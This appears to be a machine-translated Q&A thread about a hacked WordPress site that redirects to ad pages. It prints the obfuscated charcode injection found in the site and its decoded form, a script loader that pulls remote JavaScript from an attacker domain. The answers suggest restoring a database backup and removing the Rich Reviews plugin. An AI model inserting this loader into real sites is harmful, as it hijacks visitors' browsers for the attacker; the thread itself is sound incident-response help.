Jquery 如何检索被黑客入侵的wordpress网站

所以基本上我客户的网站被黑客入侵了，每次我打开，它都会重定向到另一个网站，主要是广告

它的行为，每次我运行网站时，它都会自动更改主页url和网站url

我试过了，我在cpanel中更改了主页url和站点url，但我再次运行它重定向的站点。在那之后，它也自动地在cpanel中更改为那个地址

在cpanel中更改url后，我可以访问后端，直到运行前端。我用Sucuri插件运行扫描，它会在下面给我错误消息

11:1569826918_2:Error:admin，122.160.112.18；常规设置已更改：多个条目：siteurl:从“https:\/\/foo.com”到“https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js”，主页：从“https:\/\/foo.com”到“https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js”

由于隐私原因，网站地址已更改。重定向url在那里

我检查了所有可能的文件，但没有发现任何可疑代码。谁能帮帮我吗

编辑： 经过几个小时的研究我发现这是从下面的加密代码注入的， 从charcode32,40102117110,9911610511110,40,41,32123,10,32,32,32,32118,97114,32101108101109,32,61,32100111,99117109101110116,46,99114101,97116101,69108101109110116,40,39115,99114105112116,39,41,59,32,10,9101108101109,461161101112101,32,391161011012011116,47106,97118,99114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59;

当我从这个网站解密这个代码时https://malwaredecoder.com/ ，我明白了

评价函数{ var elem=document.createElement'script'； elem.type='text/javascript'； elem.src=https://bes.belaterbewasthere.com/corn/flex.js?tp=799'; document.getElementsByTagneHead[0].appendChildelem； };;

---

对这就是urlhttps://bes.belaterbewasthere.com 重定向并抛出广告。

两天前，我遇到了同样的问题，并在代码还不存在的情况下，用一个两周前的数据库覆盖了整个数据库，从而修复了我的问题。 代码位于Rich Reviews使用的一个表中，在该表中注入了代码。该插件因该问题而闻名，并因此从Wordpress中删除。 删除插件后，我与谷歌广告词联系，他们检查了一切是否正常，然后重新启动了广告词活动

---

如果您没有备份，您可能会尝试删除插件，可能它也是与解决问题的代码所在的表相关联的丰富评论。我处理这个问题的表是rr_选项。

您可以更改cpanel、ftp和mysql服务器的密码，然后检查文件和文件夹权限您检查数据库了吗？很可能该恶意软件被注入数据库。发现：您有代码和数据库的备份吗？在本地一次还原一个，这样您就可以确定问题是在数据库还是在代码库中。@Jiniesh仍然相同。